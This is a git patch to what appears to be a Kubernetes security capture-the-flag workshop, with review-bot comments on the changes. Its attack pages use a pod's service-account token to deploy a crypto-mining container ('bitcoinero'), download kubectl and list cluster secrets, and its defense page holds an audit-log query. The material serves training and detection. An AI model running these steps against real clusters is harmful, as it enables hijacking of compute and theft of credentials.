From c2f1fa8db62dd1b5e7330a369e3d7cc9adcaa38f Mon Sep 17 00:00:00 2001
From: Tommy Falgout
Date: Wed, 22 Jan 2025 18:00:44 -0600
Subject: [PATCH] copy+paste does not work on long commands; update kubectl version
---
 docs/scenario_1_attack.md | 2 +-
 docs/scenario_2_attack.md | 51 ++++-------------------------
 docs/scenario_2_defense.md | 2 +-
 docs/scenario_3_attack.md | 2 +-
 workshop/scenario_1/bitcoinero.yaml | 13 --------
 5 files changed, 10 insertions(+), 60 deletions(-)
diff --git a/docs/scenario_1_attack.md b/docs/scenario_1_attack.md
index 88aaca8..c648458 100644
--- a/docs/scenario_1_attack.md
+++ b/docs/scenario_1_attack.md
@@ -138,7 +138,7 @@ ls /var/run/secrets/kubernetes.io/serviceaccount
 We have typical Kubernetes-related environment variables defined, and we have anonymous access to some parts of the Kubernetes API. We can see that the Kubernetes version is modern and supported -- but there's still hope if the Kubernetes security configuration is sloppy. Let's check for that next:
 ```console
-cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.28.10/bin/linux/amd64/kubectl; chmod 555 kubectl
+cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.30/bin/linux/amd64/kubectl; chmod 555 kubectl
 ```
 ```console
 kubectl get all
diff --git a/docs/scenario_2_attack.md b/docs/scenario_2_attack.md
index 2da8c28..b287781 100644
--- a/docs/scenario_2_attack.md
+++ b/docs/scenario_2_attack.md
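Review bot: The new download line `curl -LO https://dl.k8s.io/release/v1.30/bin/linux/amd64/kubectl` drops the patch component that the removed line carried (v1.28.10); as far as I know dl.k8s.io only publishes binaries under full release tags, so this path is unlikely to resolve, and because curl runs without `-f` the error body would be written to `kubectl` and made executable, with the failure only surfacing at the next `kubectl get all`. Use a full tag and fail on HTTP errors, e.g. `cd /usr/local/bin; curl -fLO https://dl.k8s.io/release/v1.30.0/bin/linux/amd64/kubectl; chmod 555 kubectl` (if a floating 1.30 is intended, `https://dl.k8s.io/release/stable-1.30.txt` gives the current patch tag, if I recall correctly). Since the binary is pulled from the network and executed straight away, the workshop could also show checking it against the `kubectl.sha256` published next to it before the chmod. The same URL is introduced in the scenario_2_attack.md and scenario_3_attack.md hunks.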
@@ -43,56 +43,19 @@ And we will be connecting to the kubernetes API from inside the cluster this tim
 export API_SERVER="https://kubernetes.default.svc"
 ```
-Lastly, we will need curl for this and our SSH image didn't come with it preinstalled:
+Let's redownload kubectl here and create our miner:
 ```console
-apk update && apk add curl
-```
-
-Now the fun part, let's create our miner:
-```console
-curl -k -X POST "$API_SERVER/apis/apps/v1/namespaces/$NAMESPACE/deployments" \
--H "Authorization: Bearer $TOKEN" \
--H "Content-Type: application/json" \
---data-binary '{
- "apiVersion":"apps/v1",
- "kind":"Deployment",
- "metadata":{
- "labels":{
- "run":"bitcoinero"},
- "name":"bitcoinero",
- "namespace":"'$NAMESPACE'"},
- "spec":{
- "replicas":1,
- "selector":{
- "matchLabels":{
- "run":"bitcoinero"}},
- "strategy":{
- "rollingUpdate":{
- "maxSurge":"25%",
- "maxUnavailable":"25%"},
- "type":"RollingUpdate"},
- "template":{
- "metadata":{
- "labels":{
- "run":"bitcoinero"}},
- "spec":{
- "containers":[{
- "image":"securekubernetes/bitcoinero:latest",
- "name":"bitcoinero",
- "command":["./moneymoneymoney"],
- "args":["-c","1","-l","10"],
- "resources":{
- "requests":{
- "cpu":"100m",
- "memory":"128Mi"},
- "limits":{
- "cpu":"200m",
- "memory":"128Mi"}}}]}}}}'
+cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.30/bin/linux/amd64/kubectl; chmod 555 kubectl
+export KUBERNETES_SERVICE_HOST=kubernetes.default.svc
+export KUBERNETES_SERVICE_PORT=443
+kubectl apply -f https://raw.githubusercontent.com/azure/aks-ctf/refs/heads/main/workshop/scenario_1/bitcoinero.yaml
 ```
 Verify that the pod is running:
 ```console
+kubectl get pods -n default
 curl -k -X GET "$API_SERVER/api/v1/namespaces/$NAMESPACE/pods?labelSelector=run%3dbitcoinero" -H "Authorization: Bearer $TOKEN" -H "Accept: application/json" 2>/dev/null | grep phase
+kubectl get pods -A
 ```
 Time for some celebratory pizza!
\ No newline at end of file
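Review bot: The namespace handling in this hunk is inconsistent: the new `kubectl apply -f …bitcoinero.yaml` passes no `-n`, so the Deployment lands wherever the manifest or the in-cluster context points, while the new verify line hard-codes `kubectl get pods -n default`, the kept curl line still filters on `$NAMESPACE`, and the scenario_2_defense.md hunk in this same commit now expects the create under `namespaces/dev`. Passing the namespace explicitly on both new commands keeps the attack steps and the audit query in step: `kubectl apply -n "$NAMESPACE" -f …` and `kubectl get pods -n "$NAMESPACE"`. The manifest is also fetched from `refs/heads/main`, so what a reader applies changes whenever that branch moves (this very commit edits the file); pinning the URL to a commit, e.g. `https://raw.githubusercontent.com/azure/aks-ctf/<COMMIT_SHA>/workshop/scenario_1/bitcoinero.yaml`, makes the scenario reproducible. Whether `$NAMESPACE` is set to `dev` in the text above this hunk is not visible here.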
diff --git a/docs/scenario_2_defense.md b/docs/scenario_2_defense.md
index a885bad..6f075a0 100644
--- a/docs/scenario_2_defense.md
+++ b/docs/scenario_2_defense.md
@@ -31,7 +31,7 @@ It's back! But how? Let's check the audit logs again:
 ```kql
 AKSAuditAdmin
-| where RequestUri startswith "/apis/apps/v1/namespaces/default/deployments"
+| where RequestUri startswith "/apis/apps/v1/namespaces/dev/deployments"
 and Verb == "create"
 and ObjectRef contains "bitcoinero"
 | project User, SourceIps, UserAgent, ObjectRef, TimeGenerated
diff --git a/docs/scenario_3_attack.md b/docs/scenario_3_attack.md
index 0b1f4dd..255359c 100644
--- a/docs/scenario_3_attack.md
+++ b/docs/scenario_3_attack.md
@@ -8,7 +8,7 @@ Lets , let's see if there's any credentials accessible.
 ```
 # In case you need to re-download kubectl
-cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.28.10/bin/linux/amd64/kubectl; chmod 555 kubectl
+cd /usr/local/bin; curl -LO https://dl.k8s.io/release/v1.30/bin/linux/amd64/kubectl; chmod 555 kubectl
 # Let's see if there's any secrets left out for us to grab
 kubectl get secrets
diff --git a/workshop/scenario_1/bitcoinero.yaml b/workshop/scenario_1/bitcoinero.yaml
index 508d41b..153b474 100644
--- a/workshop/scenario_1/bitcoinero.yaml
+++ b/workshop/scenario_1/bitcoinero.yaml
@@ -24,16 +24,3 @@ spec:
 containers:
 - image: ghcr.io/azure/aks-ctf/bitcoinero:latest
 name: bitcoinero
- command: ["./moneymoneymoney"]
- args:
- - -c
- - "1"
- - -l
- - "10"
- resources:
- requests:
- cpu: 100m
- memory: 128Mi
- limits:
- cpu: 200m
- memory: 128Mi